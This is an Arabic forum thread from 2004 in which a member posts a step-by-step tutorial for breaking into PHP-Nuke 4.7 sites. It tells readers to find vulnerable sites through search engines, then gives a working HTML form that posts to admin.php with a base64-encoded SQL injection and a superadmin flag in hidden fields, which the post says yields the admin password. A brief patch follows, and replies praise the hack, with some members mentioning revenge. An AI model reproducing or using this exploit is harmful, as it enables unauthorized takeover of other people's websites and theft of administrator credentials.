اتصل بنا البحث up a3ln usercp home
 


العودة   ::. مـنتدى قبيلـة العجمـان .:: > الـمنتديات العـلمية والتقنية > :: مـنتدى الـكمبيوتــر والاتصـالات ::

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 22-11-2004, 10:28 AM
goldskull goldskull غير متواجد حالياً
Banned
 
تاريخ التسجيل: Oct 2004
الدولة: كــــــــــــ Q8ــــــــويـــــــــــــQ8ـــــــت
المشاركات: 335
ثغرة في php nuke 4.7

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
كما عودتكم لازم موضوع جديد
الحمد لله خذينا الموضوع هذا من احد مواقع السكرتي الأجنبية وترجمناه ووسهلنا عليكم الاختراق هذي ثغرة في اصدار النيوك 4.7

نبدا الشرح
اولا نروح احد محركات البحث
www.google.com
www.yahoo.com
www.av.com

ونكتب فية للبحث العشوائي للي ما عندة موقع يخترقة
php nuke 4.7
وبعيدن تطلع النتايج عاد عد كم موقع تقدر تخترقة بس مو كلهم ممكن بعضهم سادين الثغرة بس نجرب يا سلام شلون نخترقهم انا اقول لكم

اعمل صفحة html باي طريقية عن طريق الفرونت بيج عن طريق موقع عن طريق الكاتب اي شي المهم تسوي صفحة تكون فيها الاوامر هذي

كود:
<form name="mantra" method="POST" 
action="http://www.sitewithphpnuke.com/admin.php"> 
  <p>TITLE: 
    <input type="********" name="add_title"> 
    <br> 
    CONTENT: 
    <********area name="add_content" rows=10 cols=50></********area> 
    <br> 
    DATE: 
    <input type="********" name="add_mdate"> 
    <br> 
    E-MAIL: 
    <input type="********" name="add_expire"> 
    <br> 
<input type="hidden" name="add_expire" value="0"> 
    <br> 
<input type="hidden" name="add_active" value="1"> 
    <br> 
<input type="hidden" name="add_view" value="1"> 
    <br> 
   <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> 
    <br> 
    <input type="hidden" name="add_radminsuper" value="1"> 
    <br> 
    <input type="hidden" name="op" value="addmsg"> 
  </p> 
  <p> 
    <input type="submit" name="Submit" value="Post this message"> 
    <br> 
  </p> 
</form>
الحين سجل الملف وافتحة وراح تحصل الباسورد حق مدير الموقع يلا عاد العب في الموقع لعب

===============================
سد الثغرة الاهم
ضعه في ملف admin.php


كود:
Apply this code to your admin.php file: 

if ( !empty($HTTP_GET_VARS['admin']) ) { 
   die("Shit! Mantra wins =)"); 
} 

if ( !empty($HTTP_POST_VARS['admin']) ) { 
   die("Shit! Mantra wins =)"); 
}

تحياتي
goldskull
الجمجمة الذهبية
ترقبوا كل جديد منا ان شاء الله

رد مع اقتباس
  #2  
قديم 22-11-2004, 10:50 AM
الصورة الرمزية هند
هند هند غير متواجد حالياً
 عضو vip
 
تاريخ التسجيل: Mar 2004
المشاركات: 29,801

وعليكم السلام ورحمة الله وبركاته

الجمجمة الذهبية
يعطيك العافية ، إن شاءالله نتعلم منك

لك الشكر
السؤدد

رد مع اقتباس
  #3  
قديم 22-11-2004, 11:17 AM
goldskull goldskull غير متواجد حالياً
Banned
 
تاريخ التسجيل: Oct 2004
الدولة: كــــــــــــ Q8ــــــــويـــــــــــــQ8ـــــــت
المشاركات: 335

السؤدد
حياك الله اخوي وان شاء الله اقدر اجيب لكم كل جديد

انتظروا الجديد منا ...
جولد سكل
الجمجمة الذهبية

رد مع اقتباس
  #4  
قديم 22-11-2004, 01:26 PM
كويتي كويتي غير متواجد حالياً
 عضو خاص
 
تاريخ التسجيل: Mar 2004
الدولة: K u w a i T
المشاركات: 10,114

امحق علم يا السؤدد
عز الله انج ما تعلمتــي شي فيه خيــر
هذة هاك يعني اختراق مواقع واختراق
اجهزت العالم

الجمجمه علمني لحالي خل افجــرواحد ويانه
ما ادانيـــه خخخخخخخخخخخخخ

كويتي

__________________
كـــان ياما كــــان .. في قديـــم الزمـــان

رد مع اقتباس
  #5  
قديم 23-11-2004, 06:26 AM
الصورة الرمزية ابوحمد الشامري
ابوحمد الشامري ابوحمد الشامري غير متواجد حالياً
 عضو فعال
 
تاريخ التسجيل: Feb 2004
الدولة: Kuwait
المشاركات: 4,854


لا هنت يا ابو محمد على هذا الشرح الوافي على الاختراق ما قصرت يا السنافي

ابوحمد الشامري

__________________
[color=0000FF][b][font=Times New Roman][align=center]

سَيَذْكُرُنـي قَوْمي إذا جَدّ جدّهُـمْ=وفِي اللَّيْلَةِ الظَلْمَـاءِ يُفْتَقَـدُ البَـدْرُ
وَلَوْ سَدّ غَيرِي ما سددتُ اكتفَوْا بـهِ=وَما كانَ يَغلو التّبـرُ لَوْ نَفَقَ الصُّفْـرُ
وَنَحْنُ أُنَـاسٌ ، لا تَوَسُّـطَ عِنْدَنَـا=لَنَا الصّدرُ ، دُونَ العالَمينَ ، أو القَبرُ
تَهُـونُ عَلَيْنَا فِي المَعَالـي نُفُوسُنَـا=وَمَنْ يخَطَبَ الحَسناءَ لَمْ يُغلِها المَهـرُ
أعَزُّ بَني الدّنْيَا وَأعْلَـى ذَوِي العُـلا=وَأكرَمُ مَن فَوقَ التـرَابِ وَلا فَخـْرُ

رد مع اقتباس
  #6  
قديم 23-11-2004, 02:40 PM
goldskull goldskull غير متواجد حالياً
Banned
 
تاريخ التسجيل: Oct 2004
الدولة: كــــــــــــ Q8ــــــــويـــــــــــــQ8ـــــــت
المشاركات: 335

كويتي
حياك الله اخوي كويتي نورت الموضوع بس احب اقول لك ان الهكر علم كبير ما يستهان فية بس احنا مو مرتزقة يعني نشتغل عند احد انا اعطيكم الزبدة من كل دراستي للهاك اظن مرت اربع سنين ونصف واكثر بعد وانا فية اما المواقع ثلاث سنين مختصر الكلام ان الهاك علم قوي ومن الهاك تقدر تصنع حماية جبارة

في قاعدة بالأنجليزي الترجمة مالتها تقول
اذا لم تخترق جهازك نظامك موقعك من سيفعل
فلازم احنا نحاول ما في شي من الفشل انا ميتين مرة فشلت بس نحاول جرب اي طرق المهم تنجح
كويتي باين عليك شري ههههه ودك تفجر اجهزة هههه


ابوحمد الشامري
حياك الله نورت الموضوع ان شاء الله تفيد وتستفيد وان شاء الله الله يقدرني احط لكم مواضيع عن الاختراق بس خلونا الأول نخلص من دورة المواقع

رد مع اقتباس
  #7  
قديم 25-11-2004, 07:22 PM
كويتيه كويتيه غير متواجد حالياً
 عضو خاص
 
تاريخ التسجيل: Feb 2004
الدولة: On earth
المشاركات: 16,690

يعطيك العافيه اخوي على الموضوع..

عاد انا وي اتعلم حزات يكون الواحد فيه حره على احد و وده يسوي فيه دقه لوول..

__________________

عظم الله اجر الدنيا فيك يابومبارك



بابا جابر في قلوبناا مايموت
15/1/2006...يوم الوداع

رد مع اقتباس
  #8  
قديم 25-11-2004, 08:19 PM
goldskull goldskull غير متواجد حالياً
Banned
 
تاريخ التسجيل: Oct 2004
الدولة: كــــــــــــ Q8ــــــــويـــــــــــــQ8ـــــــت
المشاركات: 335

كويتيه مشكورة على الرد وان شاء الله تسفيدي

بس عاد ان شاء الله ما يكون الشخص انا ولا راح اسجنك في لعبة السجن هههههه

رد مع اقتباس
  #9  
قديم 28-11-2004, 09:17 AM
جالس بن مبارك جالس بن مبارك غير متواجد حالياً
 عضو خاص
 
تاريخ التسجيل: Jun 2004
الدولة: كويت العز
المشاركات: 7,851

لا هنت و بيض الله و جهك

رد مع اقتباس
  #10  
قديم 28-11-2004, 04:22 PM
goldskull goldskull غير متواجد حالياً
Banned
 
تاريخ التسجيل: Oct 2004
الدولة: كــــــــــــ Q8ــــــــويـــــــــــــQ8ـــــــت
المشاركات: 335

لورنس
thanks i wish it good

رد مع اقتباس
إضافة رد


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

الساعة الآن 12:27 AM.


Powered by vBulletin® Version 3.8.0, Copyright ©2000 - 2026, Jelsoft Enterprises Ltd. TranZ By Almuhajir
Design And Develop By DevelopWay

تصميم : طريق التطوير
لحلول الإنترنت والتصميم DevelopWay.com